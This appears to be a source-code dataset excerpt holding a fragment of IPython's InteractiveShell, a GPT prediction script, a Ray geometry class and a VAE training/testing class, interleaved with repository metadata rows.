                elif async_ :
                    # 3.8+: the code object itself is a coroutine; await it.
                    await eval(code_obj, self.user_global_ns, self.user_ns)
                else:
                    exec(code_obj, self.user_global_ns, self.user_ns)
            finally:
                # Reset our crash handler in place
                sys.excepthook = old_excepthook
        except SystemExit as e:
            if result is not None:
                result.error_in_exec = e
            self.showtraceback(exception_only=True)
            warn("To exit: use 'exit', 'quit', or Ctrl-D.", stacklevel=1)
        except self.custom_exceptions:
            etype, value, tb = sys.exc_info()
            if result is not None:
                result.error_in_exec = value
            self.CustomTB(etype, value, tb)
        except:
            if result is not None:
                result.error_in_exec = sys.exc_info()[1]
            self.showtraceback(running_compiled_code=True)
        else:
            outflag = False
        return outflag

    # For backwards compatibility
    runcode = run_code
def check_complete(self, code: str) -> Tuple[str, str]:
"""Return whether a block of code is ready to execute, or should be continued
Parameters
----------
source : string
Python input code, which can be multiline.
Returns
-------
status : str
One of 'complete', 'incomplete', or 'invalid' if source is not a
prefix of valid code.
indent : str
When status is 'incomplete', this is some whitespace to insert on
the next line of the prompt.
"""
status, nspaces = self.input_transformer_manager.check_complete(code)
return status, ' ' * (nspaces or 0)
#-------------------------------------------------------------------------
# Things related to GUI support and pylab
#-------------------------------------------------------------------------
active_eventloop = None
def enable_gui(self, gui=None):
raise NotImplementedError('Implement enable_gui in a subclass')
    def enable_matplotlib(self, gui=None):
        """Enable interactive matplotlib and inline figure support.

        This takes the following steps:

        1. select the appropriate eventloop and matplotlib backend
        2. set up matplotlib for interactive use with that backend
        3. configure formatters for inline figure display
        4. enable the selected gui eventloop

        Parameters
        ----------
        gui : optional, string
          If given, dictates the choice of matplotlib GUI backend to use
          (should be one of IPython's supported backends, 'qt', 'osx', 'tk',
          'gtk', 'wx' or 'inline'), otherwise we use the default chosen by
          matplotlib (as dictated by the matplotlib build-time options plus the
          user's matplotlibrc configuration file).  Note that not all backends
          make sense in all contexts, for example a terminal ipython can't
          display figures inline.
        """
        from IPython.core import pylabtools as pt
        gui, backend = pt.find_gui_and_backend(gui, self.pylab_gui_select)

        if gui != 'inline':
            # If we have our first gui selection, store it
            if self.pylab_gui_select is None:
                self.pylab_gui_select = gui
            # Otherwise if they are different
            elif gui != self.pylab_gui_select:
                # A process can only integrate one GUI toolkit; keep the
                # first selection and warn instead of switching.
                print('Warning: Cannot change to a different GUI toolkit: %s.'
                      ' Using %s instead.' % (gui, self.pylab_gui_select))
                gui, backend = pt.find_gui_and_backend(self.pylab_gui_select)

        pt.activate_matplotlib(backend)
        pt.configure_inline_support(self, backend)

        # Now we must activate the gui pylab wants to use, and fix %run to take
        # plot updates into account
        self.enable_gui(gui)
        self.magics_manager.registry['ExecutionMagics'].default_runner = \
            pt.mpl_runner(self.safe_execfile)

        return gui, backend
    def enable_pylab(self, gui=None, import_all=True, welcome_message=False):
        """Activate pylab support at runtime.

        This turns on support for matplotlib, preloads into the interactive
        namespace all of numpy and pylab, and configures IPython to correctly
        interact with the GUI event loop.  The GUI backend to be used can be
        optionally selected with the optional ``gui`` argument.

        This method only adds preloading the namespace to InteractiveShell.enable_matplotlib.

        Parameters
        ----------
        gui : optional, string
          If given, dictates the choice of matplotlib GUI backend to use
          (should be one of IPython's supported backends, 'qt', 'osx', 'tk',
          'gtk', 'wx' or 'inline'), otherwise we use the default chosen by
          matplotlib (as dictated by the matplotlib build-time options plus the
          user's matplotlibrc configuration file).  Note that not all backends
          make sense in all contexts, for example a terminal ipython can't
          display figures inline.
        import_all : optional, bool, default: True
          Whether to do `from numpy import *` and `from pylab import *`
          in addition to module imports.
        welcome_message : deprecated
          This argument is ignored, no welcome message will be displayed.
        """
        from IPython.core.pylabtools import import_pylab

        gui, backend = self.enable_matplotlib(gui)

        # We want to prevent the loading of pylab to pollute the user's
        # namespace as shown by the %who* magics, so we execute the activation
        # code in an empty namespace, and we update *both* user_ns and
        # user_ns_hidden with this information.
        ns = {}
        import_pylab(ns, import_all)
        # warn about clobbered names
        ignored = {"__builtins__"}
        both = set(ns).intersection(self.user_ns).difference(ignored)
        # Identity (not equality) comparison: only names rebound to a
        # *different* object count as clobbered.
        clobbered = [ name for name in both if self.user_ns[name] is not ns[name] ]
        self.user_ns.update(ns)
        self.user_ns_hidden.update(ns)
        return gui, backend, clobbered
#-------------------------------------------------------------------------
# Utilities
#-------------------------------------------------------------------------
def var_expand(self, cmd, depth=0, formatter=DollarFormatter()):
"""Expand python variables in a string.
The depth argument indicates how many frames above the caller should
be walked to look for the local namespace where to expand variables.
The global namespace for expansion is always the user's interactive
namespace.
"""
ns = self.user_ns.copy()
try:
frame = sys._getframe(depth+1)
except ValueError:
# This is thrown if there aren't that many frames on the stack,
# e.g. if a script called run_line_magic() directly.
pass
else:
ns.update(frame.f_locals)
try:
# We have to use .vformat() here, because 'self' is a valid and common
# name, and expanding **ns for .format() would make it collide with
# the 'self' argument of the method.
cmd = formatter.vformat(cmd, args=[], kwargs=ns)
except Exception:
# if formatter couldn't format, just let it go untransformed
pass
return cmd
def mktempfile(self, data=None, prefix='ipython_edit_'):
"""Make a new tempfile and return its filename.
This makes a call to tempfile.mkstemp (created in a tempfile.mkdtemp),
but it registers the created filename internally so ipython cleans it up
at exit time.
Optional inputs:
- data(None): if data is given, it gets written out to the temp file
immediately, and the file is closed again."""
dirname = tempfile.mkdtemp(prefix=prefix)
self.tempdirs.append(dirname)
handle, filename = tempfile.mkstemp('.py', prefix, dir=dirname)
os.close(handle) # On Windows, there can only be one open handle on a file
self.tempfiles.append(filename)
if data:
with open(filename, 'w') as tmp_file:
tmp_file.write(data)
return filename
    @undoc
    def write(self,data):
        """DEPRECATED: Write a string to the default output"""
        # Kept only for backwards compatibility; emits a DeprecationWarning
        # pointing callers at sys.stdout directly.
        warn('InteractiveShell.write() is deprecated, use sys.stdout instead',
             DeprecationWarning, stacklevel=2)
        sys.stdout.write(data)
    @undoc
    def write_err(self,data):
        """DEPRECATED: Write a string to the default error output"""
        # Kept only for backwards compatibility; emits a DeprecationWarning
        # pointing callers at sys.stderr directly.
        warn('InteractiveShell.write_err() is deprecated, use sys.stderr instead',
             DeprecationWarning, stacklevel=2)
        sys.stderr.write(data)
    def ask_yes_no(self, prompt, default=None, interrupt=None):
        """Ask the user a yes/no question and return the answer.

        In quiet mode the question is skipped entirely and True is returned.
        Otherwise this defers to the module-level ``ask_yes_no`` helper,
        forwarding ``default`` and ``interrupt`` (their exact semantics are
        defined by that helper).
        """
        if self.quiet:
            return True
        return ask_yes_no(prompt,default,interrupt)
    def show_usage(self):
        """Show a usage message"""
        # Paged so the long usage text doesn't flood the terminal.
        page.page(IPython.core.usage.interactive_usage)
def extract_input_lines(self, range_str, raw=False):
"""Return as a string a set of input history slices.
Parameters
----------
range_str : string
The set of slices is given as a string, like "~5/6-~4/2 4:8 9",
since this function is for use by magic functions which get their
arguments as strings. The number before the / is the session
number: ~n goes n back from the current session.
raw : bool, optional
By default, the processed input is used. If this is true, the raw
input history is used instead.
Notes
-----
Slices can be described with two notations:
* ``N:M`` -> standard python form, means including items N...(M-1).
* ``N-M`` -> include items N..M (closed endpoint).
"""
lines = self.history_manager.get_range_by_str(range_str, raw=raw)
return "\n".join(x for _, _, x in lines)
    def find_user_code(self, target, raw=True, py_only=False, skip_encoding_cookie=True, search_ns=False):
        """Get a code string from history, file, url, or a string or macro.

        This is mainly used by magic functions.

        Parameters
        ----------
        target : str
          A string specifying code to retrieve. This will be tried respectively
          as: ranges of input history (see %history for syntax), url,
          corresponding .py file, filename, or an expression evaluating to a
          string or Macro in the user namespace.
        raw : bool
          If true (default), retrieve raw history. Has no effect on the other
          retrieval mechanisms.
        py_only : bool (default False)
          Only try to fetch python code, do not try alternative methods to decode file
          if unicode fails.

        Returns
        -------
        A string of code.

        ValueError is raised if nothing is found, and TypeError if it evaluates
        to an object of another type. In each case, .args[0] is a printable
        message.
        """
        # Stage 1: input-history ranges.
        code = self.extract_input_lines(target, raw=raw)  # Grab history
        if code:
            return code
        # Stage 2: URL fetch, with a latin1 fallback unless py_only.
        try:
            if target.startswith(('http://', 'https://')):
                return openpy.read_py_url(target, skip_encoding_cookie=skip_encoding_cookie)
        except UnicodeDecodeError:
            if not py_only :
                # Deferred import
                from urllib.request import urlopen
                response = urlopen(target)
                return response.read().decode('latin1')
            raise ValueError(("'%s' seem to be unreadable.") % target)

        # Stage 3: local file — try `target` plus its resolved .py variant.
        potential_target = [target]
        try :
            potential_target.insert(0,get_py_filename(target))
        except IOError:
            pass

        for tgt in potential_target :
            if os.path.isfile(tgt):                        # Read file
                try :
                    return openpy.read_py_file(tgt, skip_encoding_cookie=skip_encoding_cookie)
                except UnicodeDecodeError :
                    if not py_only :
                        with io_open(tgt,'r', encoding='latin1') as f :
                            return f.read()
                    raise ValueError(("'%s' seem to be unreadable.") % target)
            elif os.path.isdir(os.path.expanduser(tgt)):
                raise ValueError("'%s' is a directory, not a regular file." % target)

        # Stage 4 (optional): object source via the inspector.
        if search_ns:
            # Inspect namespace to load object source
            object_info = self.object_inspect(target, detail_level=1)
            if object_info['found'] and object_info['source']:
                return object_info['source']

        # Stage 5: evaluate in the user namespace; accept str or Macro.
        try:                                              # User namespace
            codeobj = eval(target, self.user_ns)
        except Exception:
            raise ValueError(("'%s' was not found in history, as a file, url, "
                                "nor in the user namespace.") % target)

        if isinstance(codeobj, str):
            return codeobj
        elif isinstance(codeobj, Macro):
            return codeobj.value

        raise TypeError("%s is neither a string nor a macro." % target,
                        codeobj)
#-------------------------------------------------------------------------
# Things related to IPython exiting
#-------------------------------------------------------------------------
def atexit_operations(self):
    """Run unconditional shutdown chores at interpreter exit.

    Cleanup and persistence that IPython always performs lives here;
    anything that depends on startup flags or platform specifics should
    register its own atexit handler instead.
    """
    # The history session must be closed (recording end time and line
    # count) *before* temp cleanup, in case the history db is a tempfile.
    self.history_manager.end_session()
    # Best-effort removal of temporary files, then temporary directories;
    # failures (already gone, non-empty dir, ...) are ignored.
    for remover, paths in ((os.unlink, self.tempfiles), (os.rmdir, self.tempdirs)):
        for path in paths:
            try:
                remover(path)
            except OSError:
                pass
    # Drop every user-namespace reference so objects are released cleanly.
    self.reset(new_session=False)
    # Finally, give registered shutdown hooks a chance to run.
    self.hooks.shutdown_hook()
def cleanup(self):
    """Restore the saved ``sys`` module state (delegates to restore_sys_module_state)."""
    self.restore_sys_module_state()
# Overridden in terminal subclass to change prompts
def switch_doctest_mode(self, mode):
    """No-op hook; terminal subclasses override this to toggle doctest-style prompts."""
    pass
class InteractiveShellABC(metaclass=abc.ABCMeta):
    """An abstract base class for InteractiveShell."""
# Register the concrete implementation as a virtual subclass, so
# isinstance(shell, InteractiveShellABC) holds without inheritance.
InteractiveShellABC.register(InteractiveShell)
| 22,915 | 14 | 1,687 |
c1200136115196f12f5dc1202f6193b76d966255 | 6,935 | py | Python | predict/gpt_predict.py | yyht/gpt2_ml_my | e0a5fae90022ecf97c4f244cfd3aa8a418787296 | [
"Apache-2.0"
] | null | null | null | predict/gpt_predict.py | yyht/gpt2_ml_my | e0a5fae90022ecf97c4f244cfd3aa8a418787296 | [
"Apache-2.0"
] | null | null | null | predict/gpt_predict.py | yyht/gpt2_ml_my | e0a5fae90022ecf97c4f244cfd3aa8a418787296 | [
"Apache-2.0"
] | null | null | null |
import sys,os
father_path = os.path.join(os.getcwd())
print(father_path, "==father path==")
bert_path = find_bert(father_path)
# t2t_bert_path = os.path.join(bert_path, "t2t_bert")
# sys.path.extend([bert_path, t2t_bert_path])
sys.path.extend([bert_path])
print(sys.path)
from predict import AppPredictor
from predict.preprocessors import GPTPreprocessor
from predict.postprocessors import GPTPostprocessor
import tensorflow as tf
from train.modeling import GroverModel, GroverConfig, sample
from bunch import Bunch
from predict.app_utils import get_selected_columns_schema
_app_flags = tf.app.flags
_app_flags.DEFINE_string("inputTable", default=None, help='Input table (only for pai cmd)')
_app_flags.DEFINE_string("outputTable", default=None, help='Output table (only for pai cmd)')
_app_flags.DEFINE_string("inputSchema", default=None,
help='Only for csv data, the schema of input table')
_app_flags.DEFINE_string("firstSequence", default=None,
help='Which column is the first sequence mapping to')
_app_flags.DEFINE_string("secondSequence", default=None,
help='Which column is the second sequence mapping to')
_app_flags.DEFINE_string("appendCols", default=None,
help='Which columns will be appended on the outputs')
_app_flags.DEFINE_string("outputSchema", default="pool_output,first_token_output,all_hidden_outputs",
help='The choices of output features')
_app_flags.DEFINE_integer("sequenceLength", default=128,
help='Maximum overall sequence length.')
_app_flags.DEFINE_string("modelName", default='',
help='Name of pretrained model')
_app_flags.DEFINE_integer("batchSize", default=32,
help='Maximum overall sequence length.')
_APP_FLAGS = _app_flags.FLAGS
app_config = GPTConfig()
predictor = AppPredictor(app_config,
thread_num=1,
queue_size=256,
job_name="app_predictor")
preprocessor = GPTPreprocessor(app_config,
thread_num=predictor.thread_num,
input_queue=queue.Queue(),
output_queue=queue.Queue())
postprocessor = GPTPostprocessor(app_config,
prediction_colname="predictions",
thread_num=predictor.thread_num,
input_queue=queue.Queue(),
output_queue=queue.Queue())
predictor.run_predict(reader=None,
preprocessor=preprocessor,
postprocessor=postprocessor,
writer=None)
| 44.455128 | 133 | 0.65119 |
import sys,os
father_path = os.path.join(os.getcwd())
print(father_path, "==father path==")
def find_bert(father_path):
    """Locate the 'gpt2_ml_my' project root at or below `father_path`.

    Performs a depth-first search of the directory tree and returns the
    path of the first directory named 'gpt2_ml_my' that is found, or ""
    when no such directory exists.
    """
    # The starting path itself may already be the project root.
    if father_path.split("/")[-1] == "gpt2_ml_my":
        return father_path
    output_path = ""
    for fi in os.listdir(father_path):
        candidate = os.path.join(father_path, fi)
        if fi == "gpt2_ml_my":
            output_path = candidate
            break
        if os.path.isdir(candidate):
            # BUG FIX: the original discarded the recursive call's return
            # value, so matches found in subdirectories were never reported.
            found = find_bert(candidate)
            if found:
                output_path = found
                break
    return output_path
bert_path = find_bert(father_path)
# t2t_bert_path = os.path.join(bert_path, "t2t_bert")
# sys.path.extend([bert_path, t2t_bert_path])
sys.path.extend([bert_path])
print(sys.path)
from predict import AppPredictor
from predict.preprocessors import GPTPreprocessor
from predict.postprocessors import GPTPostprocessor
import tensorflow as tf
from train.modeling import GroverModel, GroverConfig, sample
from bunch import Bunch
from predict.app_utils import get_selected_columns_schema
# Command-line flag definitions for the GPT prediction CLI (PAI-style).
_app_flags = tf.app.flags
_app_flags.DEFINE_string("inputTable", default=None, help='Input table (only for pai cmd)')
_app_flags.DEFINE_string("outputTable", default=None, help='Output table (only for pai cmd)')
_app_flags.DEFINE_string("inputSchema", default=None,
                         help='Only for csv data, the schema of input table')
_app_flags.DEFINE_string("firstSequence", default=None,
                         help='Which column is the first sequence mapping to')
_app_flags.DEFINE_string("secondSequence", default=None,
                         help='Which column is the second sequence mapping to')
_app_flags.DEFINE_string("appendCols", default=None,
                         help='Which columns will be appended on the outputs')
_app_flags.DEFINE_string("outputSchema", default="pool_output,first_token_output,all_hidden_outputs",
                         help='The choices of output features')
_app_flags.DEFINE_integer("sequenceLength", default=128,
                          help='Maximum overall sequence length.')
_app_flags.DEFINE_string("modelName", default='',
                         help='Name of pretrained model')
# Fixed: help text was copy-pasted from sequenceLength in the original.
_app_flags.DEFINE_integer("batchSize", default=32,
                          help='Batch size used for prediction.')
_APP_FLAGS = _app_flags.FLAGS
class GPTConfig(object):
    """Adapter that turns command-line flags into the predictor's config protocol."""
    def __init__(self):
        """ Configuration adapter for `ez_bert_feat`
        It adapts user command args to configuration protocol of `ez_transfer` engine
        """
        # NOTE(review): `FLAGS` and `get_all_columns_name` are not defined or
        # imported in this module; presumably they come from the PAI runtime
        # or a transitively imported module — confirm before reuse.
        input_table = FLAGS.tables
        output_table = FLAGS.outputs  # NOTE(review): assigned but never used
        all_input_col_names = get_all_columns_name(input_table)
        first_sequence = _APP_FLAGS.firstSequence
        assert first_sequence in all_input_col_names, "The first sequence should be in input schema"
        # The second sequence is optional: silently dropped when absent from
        # the input table's columns.
        second_sequence = _APP_FLAGS.secondSequence
        if second_sequence not in all_input_col_names:
            second_sequence = ""
        # Keep only the requested append columns that actually exist.
        append_columns = [t for t in _APP_FLAGS.appendCols.split(",") if t and t in all_input_col_names] \
            if _APP_FLAGS.appendCols else []
        tf.logging.info(input_table)
        # Select the minimal set of input columns the pipeline must read.
        selected_cols_set = [first_sequence]
        if second_sequence:
            selected_cols_set.append(second_sequence)
        selected_cols_set.extend(append_columns)
        selected_cols_set = set(selected_cols_set)
        input_schema = get_selected_columns_schema(input_table, selected_cols_set)
        # Append-through columns are added verbatim to the output schema.
        output_schema = _APP_FLAGS.outputSchema
        for column_name in append_columns:
            output_schema += "," + column_name
        config_json = {
            "preprocess_config": {
                "input_schema": input_schema,
                "output_schema": output_schema,
                "first_sequence": first_sequence,
                "second_sequence": second_sequence,
                'sequence_length': _APP_FLAGS.sequenceLength,
            },
            "model_config": {
                "my_vocab_path": "oss://alg-misc/BERT/bert_pretrain/open_domain/gpt/mega_clue_vocab/clue-vocab.txt",
            },
            "predict_config": {
                "predict_input_fp": None,
                "predict_batch_size": 1,
                "predict_output_fp": None
            }
        }
        # Distributed-execution settings come from the global FLAGS object.
        config_json["worker_hosts"] = FLAGS.worker_hosts
        config_json["task_index"] = FLAGS.task_index
        config_json["job_name"] = FLAGS.job_name
        config_json["num_gpus"] = FLAGS.workerGPU
        config_json["num_workers"] = FLAGS.workerCount
        self.worker_hosts = str(config_json["worker_hosts"])
        self.task_index = int(config_json["task_index"])
        self.job_name = str(config_json["job_name"])
        self.num_gpus = int(config_json["num_gpus"])
        self.num_workers = int(config_json["num_workers"])
        # Flatten the nested config into the attributes the pipeline reads.
        self.input_schema = config_json['preprocess_config']['input_schema']
        self.label_name = config_json['preprocess_config'].get('label_name', None)
        self.label_enumerate_values = config_json['preprocess_config'].get('label_enumerate_values', None)
        self.output_schema = config_json['preprocess_config'].get('output_schema', None)
        self.sequence_length = config_json['preprocess_config']['sequence_length']
        self.first_sequence = config_json['preprocess_config']['first_sequence']
        self.second_sequence = config_json['preprocess_config']['second_sequence']
        self.vocab_file_path = config_json['model_config']['my_vocab_path']
        self.predict_input_fp = config_json['predict_config']['predict_input_fp']
        self.predict_output_fp = config_json['predict_config'].get('predict_output_fp', None)
        self.predict_batch_size = config_json['predict_config']['predict_batch_size']
        # Pretrained Grover/GPT config and checkpoint are fetched from OSS.
        self.news_config = GroverConfig.from_json_file('oss://alg-misc/BERT/bert_pretrain/open_domain/gpt/mega_clue_vocab/mega.json')
        self.ckpt_fn = "oss://alg-misc/BERT/bert_pretrain/open_domain/gpt/mega_clue_vocab/model.ckpt-220000"
# Wire up the prediction pipeline: flags -> config -> predictor, with a
# preprocessing stage and a postprocessing stage communicating via queues.
app_config = GPTConfig()
predictor = AppPredictor(app_config,
                         thread_num=1,
                         queue_size=256,
                         job_name="app_predictor")
# NOTE(review): `queue` is never imported in this module; `queue.Queue()`
# below looks like it would raise NameError at import time unless the name
# is provided transitively — confirm.
preprocessor = GPTPreprocessor(app_config,
                               thread_num=predictor.thread_num,
                               input_queue=queue.Queue(),
                               output_queue=queue.Queue())
postprocessor = GPTPostprocessor(app_config,
                                 prediction_colname="predictions",
                                 thread_num=predictor.thread_num,
                                 input_queue=queue.Queue(),
                                 output_queue=queue.Queue())
# NOTE(review): reader/writer are None — presumably AppPredictor builds
# defaults internally; confirm against its implementation.
predictor.run_predict(reader=None,
                      preprocessor=preprocessor,
                      postprocessor=postprocessor,
                      writer=None)
| 448 | 3,700 | 46 |
ccd87448f7fcf54feb0817a1ca3ee00d9ad0bc89 | 1,930 | py | Python | order-1_voronoi/core/geometry/Ray.py | bzliu94/algorithms | 43ccefd7ea1fd88339bf2afa0b35b0a3bdf6acff | [
"MIT"
] | null | null | null | order-1_voronoi/core/geometry/Ray.py | bzliu94/algorithms | 43ccefd7ea1fd88339bf2afa0b35b0a3bdf6acff | [
"MIT"
] | null | null | null | order-1_voronoi/core/geometry/Ray.py | bzliu94/algorithms | 43ccefd7ea1fd88339bf2afa0b35b0a3bdf6acff | [
"MIT"
] | null | null | null | # constrained version of a line
# has direction
from Line import *
"""
ray1 = Ray((0, 0), (0, 1))
print ray1.getBase()
print ray1.getDirectionVector()
ray2 = Ray((1, 1), (-1, 0))
print ray1.doesIntersectWithRay(ray2)
print ray1.intersectWithRay(ray2)
"""
| 17.87037 | 96 | 0.646632 | # constrained version of a line
# has direction
from Line import *
class Ray:
    """A ray: a half-line defined by a base point and a direction vector.

    Thin wrapper around ``Line`` that restricts line intersections to
    non-negative parameter values measured from each ray's base.
    """

    def __init__(self, base, direction_vector):
        self.base = base
        self.direction_vector = direction_vector
        self.line = Line(base, direction_vector)

    def getBase(self):
        """Return the origin point of the ray."""
        return self.base

    def setBase(self, base):
        """Replace the origin point of the ray."""
        self.base = base

    def getDirectionVector(self):
        """Return the direction vector of the ray."""
        return self.direction_vector

    def setDirectionVector(self, direction_vector):
        """Replace the direction vector of the ray."""
        self.direction_vector = direction_vector

    def _getLine(self):
        """Return the unbounded Line underlying this ray."""
        return self.line

    def doesIntersectWithRay(self, ray, parameter_tolerance = 0.01):
        """Report whether this ray crosses ``ray``.

        The underlying lines must intersect, and the crossing point must lie
        at a parameter value of at least -parameter_tolerance along both
        rays (the tolerance admits near-base crossings).
        """
        own_line = self._getLine()
        other_line = ray._getLine()
        if own_line.doesIntersectWithLine(other_line) == False:
            return False
        crossing = own_line.intersectWithLine(other_line)
        own_param = own_line.getParameterValue(crossing)
        other_param = other_line.getParameterValue(crossing)
        cutoff = -1 * parameter_tolerance
        return own_param >= cutoff and other_param >= cutoff

    def intersectWithRay(self, ray):
        """Return the intersection point of the two underlying lines.

        NOTE(review): as in the original, this does not verify the crossing
        lies on both rays — callers should check doesIntersectWithRay first.
        """
        return self._getLine().intersectWithLine(ray._getLine())

    def toString(self):
        """Return '<base> <direction_vector>' as a string."""
        return str(self.getBase()) + " " + str(self.getDirectionVector())
"""
ray1 = Ray((0, 0), (0, 1))
print ray1.getBase()
print ray1.getDirectionVector()
ray2 = Ray((1, 1), (-1, 0))
print ray1.doesIntersectWithRay(ray2)
print ray1.intersectWithRay(ray2)
"""
| 1,090 | 526 | 24 |
8608d8cb73b28b9b1b106887d5308377e5628df2 | 6,738 | py | Python | tester/VAE_tester.py | y-x-c/electricauth | 1c223e9883b9e6382eabbf9a42629e471e039c4e | [
"MIT"
] | 1 | 2021-05-01T16:05:19.000Z | 2021-05-01T16:05:19.000Z | tester/VAE_tester.py | y-x-c/electricauth | 1c223e9883b9e6382eabbf9a42629e471e039c4e | [
"MIT"
] | null | null | null | tester/VAE_tester.py | y-x-c/electricauth | 1c223e9883b9e6382eabbf9a42629e471e039c4e | [
"MIT"
] | null | null | null | import torch
from torch import nn
import numpy as np
import pickle
import os
from model.VAE import VAE
from data.normalization import ChallengeNormalizer
from util.utils import iterate_minibatches
from util.cache import load_model, save_model
from config.general import cache_dir
| 35.277487 | 80 | 0.532057 | import torch
from torch import nn
import numpy as np
import pickle
import os
from model.VAE import VAE
from data.normalization import ChallengeNormalizer
from util.utils import iterate_minibatches
from util.cache import load_model, save_model
from config.general import cache_dir
class VAETester(object):
    """Train and evaluate a (variational) autoencoder for reconstruction scoring.

    Owns a ChallengeNormalizer fitted on the training split and a VAE model.
    Construction either loads cached weights, trains from scratch, or raises
    when neither option is available.
    """
    def __init__(self, X_train, y_train, X_val=None, y_val=None, gpu=None,
                 lr=1e-3, batchsize_train=2, batchsize_test=200,
                 epochs=50, verbose=False,
                 cache_name=None, load_trained=False, no_train=False,
                 n_latent_features=20,
                 n_hidden=400,
                 no_variational=False,
                 ):
        """Build the model and obtain weights by loading or training.

        X_train is indexed as (samples, channels, length): shape[1] feeds
        n_sensor_channel and shape[2] feeds input_length of the VAE.
        gpu is a CUDA device index, or None to stay on CPU.
        cache_name / load_trained / no_train control the caching logic.
        Raises RuntimeError when no cached model exists and no_train=True.
        """
        normalizer = ChallengeNormalizer(X_train, y_train)
        self.normalizer = normalizer
        net = VAE(input_length=X_train.shape[2],
                  n_sensor_channel=X_train.shape[1],
                  n_latent_features=n_latent_features,
                  n_hidden=n_hidden,
                  no_variational=no_variational)
        self.net = net
        self.batchsize_test = batchsize_test
        self.use_gpu = not gpu is None
        if self.use_gpu:
            torch.cuda.set_device(gpu)
            net = net.cuda()
        # Prefer cached weights; fall back to training unless forbidden.
        model_state_dict = load_model(cache_name, gpu) if load_trained else None
        if model_state_dict:
            self.net.load_state_dict(model_state_dict)
        elif not no_train:
            self.train(X_train, y_train, X_val, y_val, epochs=epochs, lr=lr,
                       batchsize_train=batchsize_train, batchsize_test=batchsize_test,
                       verbose=verbose)
            if cache_name:
                save_model(cache_name, net)
                # Persist training curves and hyper-parameters next to the
                # cached weights for later inspection.
                cache_path = os.path.join(cache_dir, cache_name + '.log')
                with open(cache_path, 'wb') as f:
                    pickle.dump(dict(
                        train_loss=self.train_loss_list,
                        val_loss=self.val_loss_list,
                        lr=lr,
                        batchsize_train=batchsize_train,
                        epochs=epochs
                    ), f)
            if X_val is not None:
                print('@last epoch, train loss {:4f}, val loss {:4f}'.format(
                    self.train_loss_list[-1], self.val_loss_list[-1]))
            else:
                print('@last epoch, train loss {:4f}'.format(
                    self.train_loss_list[-1]))
        else:
            raise RuntimeError('No trained model available and no_train=True')
    def train(self, X_train, y_train, X_val, y_val, epochs, lr, batchsize_train,
              batchsize_test, verbose):
        """Fit the autoencoder with Adam on mean-squared reconstruction error.

        Fills self.train_loss_list / self.val_loss_list with per-epoch,
        per-sample average losses.
        NOTE(review): only reconstruction MSE is optimized here; no
        KL-divergence term appears even when no_variational is False —
        confirm that is intended.
        """
        normalizer = self.normalizer
        X_train = normalizer.normalize(X_train, y_train)
        if X_val is not None:
            X_val = normalizer.normalize(X_val, y_val)
        net = self.net
        optimizer = torch.optim.Adam(net.parameters(), lr=lr)
        criterion = nn.MSELoss()
        self.train_loss_list = train_loss_list = []
        self.val_loss_list = val_loss_list = []
        for e in range(epochs):
            net.train()
            train_loss_epoch = 0.
            val_loss_epoch = 0.
            for batch in iterate_minibatches(inputs=X_train, targets=None,
                                             batchsize=batchsize_train):
                x = batch
                inputs = torch.from_numpy(x)
                if self.use_gpu:
                    inputs = inputs.cuda()
                optimizer.zero_grad()
                # The VAE consumes flattened per-sample vectors.
                inputs = inputs.view(inputs.shape[0], -1)
                outputs, mu, logvar = net(inputs)
                loss = criterion(outputs, inputs)
                # Weight by batch size so the division below yields a true
                # per-sample epoch mean even with a ragged last batch.
                train_loss_epoch += loss.item() * x.shape[0]
                loss.backward()
                optimizer.step()
            train_loss_epoch /= X_train.shape[0]
            train_loss_list.append(train_loss_epoch)
            if X_val is not None:
                net.eval()
                with torch.no_grad():
                    for batch in iterate_minibatches(inputs=X_val,
                                                     targets=None, batchsize=batchsize_test):
                        x = batch
                        inputs = torch.from_numpy(x)
                        if self.use_gpu:
                            inputs = inputs.cuda()
                        inputs = inputs.view(inputs.shape[0], -1)
                        outputs, mu, logvar = net(inputs)
                        loss = criterion(outputs, inputs)
                        val_loss_epoch += loss.item() * x.shape[0]
                val_loss_epoch /= X_val.shape[0]
                val_loss_list.append(val_loss_epoch)
                net.train()
            if verbose:
                print("Epoch: {}/{}...".format(e+1, epochs),
                      "Train Loss: {:.4f}...".format(train_loss_epoch),
                      "Val Loss: {:.4f}...".format(val_loss_epoch))
    def test(self, X_test, y_test):
        """Score X_test by per-sample reconstruction error.

        Returns (scores, mu, logvar, reconstructions): scores is the mean
        squared error per sample; reconstructions are reshaped back to the
        input layout and mapped through the normalizer's inverse.
        """
        X_test = self.normalizer.normalize(X_test, y_test)
        net = self.net
        # reduction='none' keeps element-wise errors so we can average per
        # sample rather than over the whole batch.
        criterion = nn.MSELoss(reduction='none')
        score_list = np.array([])
        mu_list = None
        logvar_list = None
        reconstructed_list = None
        net.eval()
        with torch.no_grad():
            for batch in iterate_minibatches(X_test, targets=None,
                                             batchsize=self.batchsize_test, shuffle=False):
                x = batch
                inputs = torch.from_numpy(x)
                if self.use_gpu:
                    inputs = inputs.cuda()
                inputs = inputs.view(inputs.shape[0], -1)
                outputs, mu, logvar = net(inputs)
                loss = criterion(outputs, inputs)
                loss = torch.mean(loss, dim=(1))
                loss = loss.cpu().numpy()
                score_list = np.concatenate([score_list, loss])
                mu = mu.detach().cpu().numpy()
                logvar = logvar.detach().cpu().numpy()
                outputs = outputs.detach().cpu().numpy()
                # First batch initializes each accumulator array.
                mu_list = np.concatenate([mu_list, mu]) \
                    if mu_list is not None else mu
                logvar_list = np.concatenate([logvar_list, logvar]) \
                    if logvar_list is not None else logvar
                reconstructed_list = \
                    np.concatenate([reconstructed_list, outputs]) \
                    if reconstructed_list is not None else outputs
        # shuffle=False above keeps output order aligned with X_test, so the
        # flat outputs can be reshaped back to the original sample layout.
        reconstructed_list = reconstructed_list.reshape(X_test.shape)
        reconstructed_list = self.normalizer.denormalize(
            reconstructed_list, y_test)
        return score_list, mu_list, logvar_list, reconstructed_list
| 6,346 | 3 | 108 |
f704f29d917dfbd51e439f0dd5292f602da50c6f | 8,655 | py | Python | modelci/experimental/model/model_structure.py | FerdinandZhong/ML-Model-CI | 90fa2de056dca05031f0787b96c520dc57dc664d | [
"Apache-2.0"
] | 170 | 2020-06-08T18:30:52.000Z | 2022-03-28T12:08:11.000Z | modelci/experimental/model/model_structure.py | FerdinandZhong/ML-Model-CI | 90fa2de056dca05031f0787b96c520dc57dc664d | [
"Apache-2.0"
] | 146 | 2020-06-14T18:56:27.000Z | 2022-02-27T21:15:59.000Z | modelci/experimental/model/model_structure.py | FerdinandZhong/ML-Model-CI | 90fa2de056dca05031f0787b96c520dc57dc664d | [
"Apache-2.0"
